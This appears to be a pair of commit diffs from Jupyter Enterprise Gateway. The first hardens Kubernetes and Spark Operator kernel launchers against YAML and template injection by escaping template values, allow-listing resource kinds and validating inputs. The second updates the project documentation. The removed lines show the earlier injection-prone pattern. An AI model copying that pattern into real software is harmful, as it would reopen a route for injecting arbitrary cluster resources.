     # Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client
       {% if kernel_volumes %}
         {% for volume in kernel_volumes %}
    -  - {{ volume }}
    +  - {{ volume | yaml_safe }}
         {% endfor %}
       {% endif %}
    
  • etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py+52 6 modified
    @@ -15,6 +15,26 @@
     
     KERNEL_POD_TEMPLATE_PATH = "/kernel-pod.yaml.j2"
     
    +ALLOWED_K8S_KINDS = {"Pod", "Secret", "PersistentVolumeClaim", "PersistentVolume", "Service", "ConfigMap"}
    +MAX_DOCUMENTS_PER_KIND = 1
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_pod_yaml(keywords):
         """Return the kubernetes pod spec as a yaml string.
    @@ -35,9 +55,8 @@ def generate_kernel_pod_yaml(keywords):
                 default=True,
             ),
         )
    -    # jinja2 template substitutes template variables with None though keywords doesn't
    -    # contain corresponding item. Therefore, no need to check if any are left unsubstituted.
    -    # Kubernetes API server will validate the pod spec instead.
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template(KERNEL_POD_TEMPLATE_PATH).render(**keywords)
     
         return k8s_yaml
    @@ -128,10 +147,20 @@ def launch_kubernetes_kernel(
         )
     
         # Walk env variables looking for names prefixed with KERNEL_.  When found, set corresponding keyword value
    -    # with name in lower case.
    +    # with name in lower case.  Only parse YAML for variables that legitimately carry structured data
    +    # (lists/dicts); treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         # Substitute all template variable (wrapped with {{ }}) and generate `yaml` string.
         k8s_yaml = generate_kernel_pod_yaml(keywords)
    @@ -146,7 +175,24 @@ def launch_kubernetes_kernel(
         pod_template = None
         pod_created = None
         kernel_namespace = keywords["kernel_namespace"]
    -    k8s_objs = yaml.safe_load_all(k8s_yaml)
    +    k8s_objs = list(yaml.safe_load_all(k8s_yaml))
    +    kind_counts: Dict[str, int] = {}
    +    for k8s_obj in k8s_objs:
    +        if not k8s_obj:
    +            continue
    +        kind = k8s_obj.get("kind")
    +        if kind not in ALLOWED_K8S_KINDS:
    +            sys.exit(
    +                f"ERROR - Unexpected resource kind '{kind}' in rendered manifest - "
    +                f"kernel launch terminating!"
    +            )
    +        kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +    for kind, count in kind_counts.items():
    +        if count > MAX_DOCUMENTS_PER_KIND:
    +            sys.exit(
    +                f"ERROR - Rendered manifest contains {count} '{kind}' documents "
    +                f"(max {MAX_DOCUMENTS_PER_KIND}) - kernel launch terminating!"
    +            )
         for k8s_obj in k8s_objs:
             if k8s_obj.get("kind"):
                 if k8s_obj["kind"] == "Pod":
    
  • etc/kernel-launchers/operators/scripts/launch_custom_resource.py+38 1 modified
    @@ -2,6 +2,7 @@
     """Launch a custom operator resource."""
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -11,6 +12,24 @@
     
     urllib3.disable_warnings()
     
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
         """Generate the kernel custom resource yaml given a template."""
    @@ -27,6 +46,8 @@ def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
                 default=True,
             ),
         )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template("/" + kernel_crd_template + ".yaml.j2").render(**keywords)
         return k8s_yaml
     
    @@ -70,18 +91,34 @@ def launch_custom_resource_kernel(
         )
         keywords["spark_context_initialization_mode"] = spark_context_init_mode
     
    +    # Only parse YAML for variables that legitimately carry structured data (lists/dicts);
    +    # treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         kernel_crd_template = keywords["kernel_crd_group"] + "-" + keywords["kernel_crd_version"]
    +    if not re.match(r'^[a-z0-9][a-z0-9.\-]*-v[a-z0-9]+$', kernel_crd_template):
    +        sys.exit(f"ERROR - Invalid CRD template name: {kernel_crd_template} - kernel launch terminating!")
    +
         custom_resource_yaml = generate_kernel_custom_resource_yaml(kernel_crd_template, keywords)
     
         kernel_namespace = keywords["kernel_namespace"]
         group = keywords["kernel_crd_group"]
         version = keywords["kernel_crd_version"]
         plural = keywords["kernel_crd_plural"]
         custom_resource_object = yaml.safe_load(custom_resource_yaml)
    +    if not isinstance(custom_resource_object, dict) or "kind" not in custom_resource_object:
    +        sys.exit("ERROR - Rendered CRD manifest is not a valid single-document YAML - kernel launch terminating!")
         if group == "sparkoperator.k8s.io":
             extend_operator_env(custom_resource_object, "driver")
             extend_operator_env(custom_resource_object, "executor")
    
  • etc/kernel-launchers/operators/scripts/sparkoperator.k8s.io-v1beta2.yaml.j2+16 16 modified
    @@ -1,26 +1,26 @@
     apiVersion: "sparkoperator.k8s.io/v1beta2"
     kind: SparkApplication
     metadata:
    -  name: {{ kernel_resource_name }}
    +  name: {{ kernel_resource_name | yaml_safe }}
     spec:
       restartPolicy:
         type: Never
       type: Python
       pythonVersion: "3"
       sparkVersion: 2.4.5
    -  image: {{ kernel_image }}
    +  image: {{ kernel_image | yaml_safe }}
       mainApplicationFile: "local:///usr/local/bin/kernel-launchers/python/scripts/launch_ipykernel.py"
       arguments:
         - "--kernel-id"
    -    - "{{ kernel_id }}"
    +    - {{ kernel_id | yaml_safe }}
         - "--spark-context-initialization-mode"
    -    - "{{ spark_context_initialization_mode }}"
    +    - {{ spark_context_initialization_mode | yaml_safe }}
         - "--response-address"
    -    - "{{ eg_response_address }}"
    +    - {{ eg_response_address | yaml_safe }}
         - "--port-range"
    -    - "{{ eg_port_range }}"
    +    - {{ eg_port_range | yaml_safe }}
         - "--public-key"
    -    - "{{ eg_public_key }}"
    +    - {{ eg_public_key | yaml_safe }}
       driver:
         annotations:
           cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
    @@ -30,9 +30,9 @@ spec:
     # e.g., helm install my-release spark-operator/spark-operator --namespace spark-operator --set webhook.enable=true
     #    - name: MY_DRIVER_ENV
     #      value: "my_driver_value"
    -    serviceAccount: "{{ kernel_service_account_name }}"
    +    serviceAccount: {{ kernel_service_account_name | yaml_safe }}
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: kernel
         cores: 1
    @@ -41,13 +41,13 @@ spec:
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
       executor:
    @@ -58,26 +58,26 @@ spec:
     #    - name: MY_EXECUTOR_ENV
     #      value: "my_executor_value"
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: worker
    -    image: {{ kernel_executor_image }}
    +    image: {{ kernel_executor_image | yaml_safe }}
         instances: 2
         cores: 1
         coreLimit: 1000m
         memory: 1g
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
     {% if kernel_sparkapp_config_map %}
    -  sparkConfigMap: {{ kernel_sparkapp_config_map }}
    +  sparkConfigMap: {{ kernel_sparkapp_config_map | yaml_safe }}
     {% endif %}
    
577511b76e42

Sync documentation with latest implementation

https://github.com/jupyter-server/enterprise_gatewayLuciano ResendeApr 23, 2026Fixed in 3.3.0via ghsa-release-walk
12 files changed · +93 33
  • docs/source/contributors/docker.md+4 0 modified
    @@ -4,6 +4,10 @@ All docker images can be pulled from docker hub's [elyra organization](https://h
     
     Local images can also be built via `make docker-images`.
     
    +```{note}
    +Base images and versions change over time. Check the Dockerfiles in [etc/docker](https://github.com/jupyter-server/enterprise_gateway/tree/main/etc/docker) for the current base images used in each build.
    +```
    +
     The following sections describe the docker images used within Kubernetes and Docker Swarm environments.
     
     ## elyra/enterprise-gateway
    
  • docs/source/contributors/roadmap.md+12 6 modified
    @@ -2,23 +2,29 @@
     
     We have plenty to do, now and in the future. Here's where we're headed:
     
    -## Planned for 3.0
    +## Completed in 3.x
     
    -- Spark 3.0 support
    -  - Includes pod template files
    +- Spark 3.0 support (including pod template files)
    +- Spark Operator support via `SparkOperatorProcessProxy`
    +- Custom Resource Definition support via `CustomResourceProcessProxy`
    +- Session persistence (file-based and webhook-based)
    +- `KERNEL_VOLUMES` and `KERNEL_VOLUME_MOUNTS` for Kubernetes and Spark Operator kernels
    +- Authorizer class override support (`EG_AUTHORIZER_CLASS`)
    +- SSTI prevention in `KERNEL_POD_NAME` template substitution
    +- Python 3.9 and below dropped; Python 3.10+ required
     
     ## Planned for 4.0
     
     - Kernel Provisioners
    -  - Provisioners will replace process proxies and enable Enterprise Gateway to remove its cap on `jupyter_client < 7`.
    +  - Provisioners will replace process proxies and enable Enterprise Gateway to remove its cap on `jupyter_client < 7` and `jupyter_server < 2`.
     - Parameterized Kernels
       - Enable the ability to prompt for parameters
    -  - These will likely be based on kernel provisioners (4.0)
    +  - These will likely be based on kernel provisioners
     
     ## Wish list
     
     - High Availability
    -  - Session persistence using a shared location (NoSQL DB) (File persistence has been implemented)
    +  - Session persistence using a shared location (NoSQL DB) (file-based persistence has been implemented)
       - Active/active support
     - Multi-gateway support on client-side
       - Enables the ability for a single Jupyter Server to be configured against multiple Gateway servers simultaneously. This work will primarily be in Jupyter Server.
    
  • docs/source/contributors/system-architecture.md+17 0 modified
    @@ -153,6 +153,23 @@ required to be located within the Enterprise Gateway hierarchy - i.e., we embrac
     
     ![Process Class Hierarchy](../images/process_proxy_hierarchy.png)
     
    +The complete process proxy class hierarchy is:
    +
    +```text
    +BaseProcessProxyABC
    +├── LocalProcessProxy
    +└── RemoteProcessProxy
    +    ├── DistributedProcessProxy
    +    ├── YarnClusterProcessProxy
    +    ├── ConductorClusterProcessProxy
    +    └── ContainerProcessProxy
    +        ├── DockerSwarmProcessProxy
    +        ├── DockerProcessProxy
    +        └── KubernetesProcessProxy
    +            └── CustomResourceProcessProxy
    +                └── SparkOperatorProcessProxy
    +```
    +
     The process proxy constructor looks as follows:
     
     ```python
    
  • docs/source/developers/dev-process-proxy.md+4 4 modified
    @@ -1,6 +1,6 @@
     # Implementing a process proxy
     
    -A process proxy implementation is necessary if you want to interact with a resource manager that is not currently supported or extend some existing behaviors. For example, recently, we've had [contributions](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/services/processproxies/crd.py#L9) that interact with [Kubernetes Custom Resource Definitions](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/#customresourcedefinitions), which is an example of _extending_ the `KubernetesProcessProxy` to accomplish a slightly different task.
    +A process proxy implementation is necessary if you want to interact with a resource manager that is not currently supported or extend some existing behaviors. For example, recently, we've had [contributions](https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/services/processproxies/crd.py#L18) that interact with [Kubernetes Custom Resource Definitions](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/#customresourcedefinitions), which is an example of _extending_ the `KubernetesProcessProxy` to accomplish a slightly different task.
     
     Examples of resource managers in which there's been some interest include [Slurm Workload Manager](https://slurm.schedmd.com/documentation.html) and [Apache Mesos](https://mesos.apache.org/), for example. In the end, it's really a matter of having access to an API and the ability to apply "tags" or "labels" in order to _discover_ where the kernel is running within the managed cluster. Once you have that information, then it becomes of matter of implementing the appropriate methods to control the kernel's lifecycle.
     
    @@ -18,7 +18,7 @@ That said, if you and your organization plan to stay on Enterprise Gateway 2.x o
     
     Please refer to the [Process Proxy section](../contributors/system-architecture.md#process-proxy) in the System Architecture pages for descriptions and structure of existing process proxies. Here is the general guideline for the process of implementing a process proxy.
     
    -1. Identify and understand how to _decorate_ your "job" within the resource manager. In Hadoop YARN, this is done by using the kernel's ID as the _application name_ by setting the [`--name` parameter to `${KERNEL_ID}`](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernelspecs/spark_python_yarn_cluster/kernel.json#L14). In Kubernetes, we apply the kernel's ID to the [`kernel-id` label on the POD](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L16).
    +1. Identify and understand how to _decorate_ your "job" within the resource manager. In Hadoop YARN, this is done by using the kernel's ID as the _application name_ by setting the [`--name` parameter to `${KERNEL_ID}`](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernelspecs/spark_python_yarn_cluster/kernel.json). In Kubernetes, we apply the kernel's ID to the [`kernel-id` label on the POD](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2).
     1. Today, all invocations of kernels into resource managers use a shell or python script mechanism configured into the `argv` stanza of the kernelspec. If you take this approach, you need to apply the necessary changes to integrate with your resource manager.
     1. Determine how to interact with the resource manager's API to _discover_ the kernel and determine on which host it's running. This interaction should occur immediately following Enterprise Gateway's receipt of the kernel's connection information in its response from the kernel launcher. This extra step, performed within `confirm_remote_startup()`, is necessary to get the appropriate host name as reflected in the resource manager's API.
     1. Determine how to monitor the "job" using the resource manager API. This will become part of the `poll()` implementation to determine if the kernel is still running. This should be as quick as possible since it occurs every 3 seconds. If this is an expensive call, you may need to make some adjustments like skip the call every so often.
    @@ -30,8 +30,8 @@ Because kernel IDs are globally unique, they serve as ideal identifiers for disc
     
     You will likely need to provide implementations for `launch_process()`, `poll()`, `wait()`, `send_signal()`, and `kill()`, although, depending on where your process proxy resides in the class hierarchy, some implementations may be reused.
     
    -For example, if your process proxy is going to service remote kernels, you should consider deriving your implementation from the [`RemoteProcessProxy` class](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/services/processproxies/processproxy.py#L981). If this is the case, then you'll need to implement `confirm_remote_startup()`.
    +For example, if your process proxy is going to service remote kernels, you should consider deriving your implementation from the [`RemoteProcessProxy` class](https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/services/processproxies/processproxy.py#L1070). If this is the case, then you'll need to implement `confirm_remote_startup()`.
     
    -Likewise, if your process proxy is based on containers, you should consider deriving your implementation from the [`ContainerProcessProxy`](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/services/processproxies/container.py#L34). If this is the case, then you'll need to implement `get_container_status()` and `terminate_container_resources()` rather than `confirm_remote_startup()`, etc.
    +Likewise, if your process proxy is based on containers, you should consider deriving your implementation from the [`ContainerProcessProxy`](https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/services/processproxies/container.py#L39). If this is the case, then you'll need to implement `get_container_status()` and `terminate_container_resources()` rather than `confirm_remote_startup()`, etc.
     
     Once the process proxy has been implemented, construct an appropriate kernel specification that references your process proxy and iterate until you are satisfied with how your remote kernels behave.
    
  • docs/source/developers/kernel-launcher.md+4 4 modified
    @@ -21,15 +21,15 @@ The port used between Enterprise Gateway and the launcher, known as the _communi
     
     ## Encrypting the connection information
     
    -The next task of the kernel launcher is sending the connection information back to the Enterprise Gateway server. Prior to doing this, the connection information, including the communication port, are encrypted using AES encryption and a 16-byte key. The AES key is then encrypted using the public key specified in the `public_key` parameter. These two fields (the AES-encrypted payload and the publice-key-encrypted AES key) are then included into a JSON structure that also include the launcher's version information and base64 encoded. Here's such an example from the [Python kernel launcher](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L188-L209).
    +The next task of the kernel launcher is sending the connection information back to the Enterprise Gateway server. Prior to doing this, the connection information, including the communication port, are encrypted using AES encryption and a 16-byte key. The AES key is then encrypted using the public key specified in the `public_key` parameter. These two fields (the AES-encrypted payload and the publice-key-encrypted AES key) are then included into a JSON structure that also include the launcher's version information and base64 encoded. Here's such an example from the [Python kernel launcher](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L207).
     
    -The payload is then [sent back on a socket](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L212-L256) identified by the `--response-address` option.
    +The payload is then [sent back on a socket](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/python/scripts/launch_ipykernel.py#L235) identified by the `--response-address` option.
     
     ## Invoking the target kernel
     
    -For the R kernel launcher, the kernel is started using [`IRKernel::main()`](https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/etc/kernel-launchers/R/scripts/launch_IRkernel.R#L252) after the `SparkContext` is initialized based on the `spark-context-initialization-mode` parameter.
    +For the R kernel launcher, the kernel is started using [`IRKernel::main()`](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/R/scripts/launch_IRkernel.R#L256) after the `SparkContext` is initialized based on the `spark-context-initialization-mode` parameter.
     
    -The scala kernel launcher works similarly in that the Apache Toree kernel provides an ["entrypoint" to start the kernel](https://github.com/jupyter-server/enterprise_gateway/blob/00d7376b932eacd347b3c32c863691bfbad53b86/etc/kernel-launchers/scala/toree-launcher/src/main/scala/launcher/ToreeLauncher.scala#L332), however, because the Toree kernel initializes a `SparkContext` itself, the need to do so is conveyed directly to the kernel.
    +The scala kernel launcher works similarly in that the Apache Toree kernel provides an ["entrypoint" to start the kernel](https://github.com/jupyter-server/enterprise_gateway/blob/main/etc/kernel-launchers/scala/toree-launcher/src/main/scala/launcher/ToreeLauncher.scala#L315), however, because the Toree kernel initializes a `SparkContext` itself, the need to do so is conveyed directly to the kernel.
     
     For the Python kernel launcher, it creates a namespace instance that contains the `SparkContext` information, if requested to do so via the `spark-context-initialization-mode` parameter, instantiates an `IPKernelApp` instance using the configured namespace, then calls the [`start()`](https://github.com/ipython/ipykernel/blob/6f448d280dadbff7245f4b28b5e210c899d79342/ipykernel/kernelapp.py#L694) method.
     
    
  • docs/source/developers/kernel-specification.md+2 2 modified
    @@ -21,8 +21,8 @@ Here's an example from the [`spark_python_yarn_cluster`](https://github.com/jupy
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -    "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
         "LAUNCH_OPTS": ""
       },
       "argv": [
    
  • docs/source/developers/rest-api.rst+4 4 modified
    @@ -178,7 +178,7 @@ the icon filenames to be used by the front-end application.
                 "env": {
                   "SPARK_HOME": "/usr/hdp/current/spark2-client",
                   "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -              "PYTHONPATH": "${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +              "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
                   "SPARK_OPTS": "--master yarn --deploy-mode client --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} ${KERNEL_EXTRA_SPARK_OPTS}",
                   "LAUNCH_OPTS": ""
                 },
    @@ -215,8 +215,8 @@ the icon filenames to be used by the front-end application.
                 "env": {
                   "SPARK_HOME": "/usr/hdp/current/spark2-client",
                   "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -              "PYTHONPATH": "${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -              "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.8/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
    +              "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +              "SPARK_OPTS": "--master yarn --deploy-mode cluster --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false --conf spark.yarn.appMasterEnv.PYTHONUSERBASE=/home/${KERNEL_USERNAME}/.local --conf spark.yarn.appMasterEnv.PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip --conf spark.yarn.appMasterEnv.PATH=/opt/conda/bin:$PATH ${KERNEL_EXTRA_SPARK_OPTS}",
                   "LAUNCH_OPTS": ""
                 },
                 "display_name": "Spark - Python (YARN Cluster Mode)",
    @@ -346,7 +346,7 @@ In this example, we will start the ``spark_python_yarn_cluster`` kernel with a `
     
     Kernel code execution
     ~~~~~~~~~~~~~~~~~~~~~
    -Upgrading the connection to a websocket and issuing code against that websocket is currently beyond the knowledge of our maintainers.  For this aspect of this discussion we will refer you to our Python `GatewayClient class <https://github.com/jupyter-server/enterprise_gateway/blob/54c8e31d9b17418f35454b49db691d2ce5643c22/enterprise_gateway/client/gateway_client.py#L22>`_ that we use in our integration tests.
    +Upgrading the connection to a websocket and issuing code against that websocket is currently beyond the knowledge of our maintainers.  For this aspect of this discussion we will refer you to our Python `GatewayClient class <https://github.com/jupyter-server/enterprise_gateway/blob/main/enterprise_gateway/client/gateway_client.py#L20>`_ that we use in our integration tests.
     
     .. note::
     
    
  • docs/source/operators/config-availability.md+4 0 modified
    @@ -88,6 +88,10 @@ As noted above, the availability modes rely on the persisted information relativ
     
     File Kernel Session Persistence stores kernel sessions as files in a specified directory. To enable this form of persistence, set the environment variable `EG_KERNEL_SESSION_PERSISTENCE=True` or configure `FileKernelSessionManager.enable_persistence=True`. To change the directory in which the kernel session file is being saved, either set the environment variable `EG_PERSISTENCE_ROOT` or configure `FileKernelSessionManager.persistence_root` to the directory. By default, the directory used to store a given kernel's session information is the `JUPYTER_DATA_DIR`.
     
    +```{note}
    +Enterprise Gateway handles corrupted or invalid session files gracefully. If a persisted session file contains invalid JSON or cannot be read, the error is logged and that session is skipped rather than preventing Enterprise Gateway from starting.
    +```
    +
     ```{note}
     Because `FileKernelSessionManager` is the default class for kernel session persistence, configuring `EnterpriseGatewayApp.kernel_session_manager_class` to `enterprise_gateway.services.sessions.kernelsessionmanager.FileKernelSessionManager` is not necessary.
     ```
    
  • docs/source/operators/deploy-distributed.md+4 4 modified
    @@ -131,8 +131,8 @@ After that, you should have a `kernel.json` that looks similar to the one below:
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
         "SPARK_OPTS": "--master yarn --deploy-mode client --name ${KERNEL_ID:-ERROR__NO__KERNEL_ID} --conf spark.yarn.submit.waitAppCompletion=false",
         "LAUNCH_OPTS": ""
       },
    @@ -179,8 +179,8 @@ After that, you should have a `kernel.json` that looks similar to the one below:
       "env": {
         "SPARK_HOME": "/usr/hdp/current/spark2-client",
         "PYSPARK_PYTHON": "/opt/conda/bin/python",
    -    "PYTHONPATH": "${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    -    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.6/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
    +    "PYTHONPATH": "${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip",
    +    "SPARK_YARN_USER_ENV": "PYTHONUSERBASE=/home/yarn/.local,PYTHONPATH=${HOME}/.local/lib/python3.10/site-packages:/usr/hdp/current/spark2-client/python:/usr/hdp/current/spark2-client/python/lib/py4j-0.10.6-src.zip,PATH=/opt/conda/bin:$PATH",
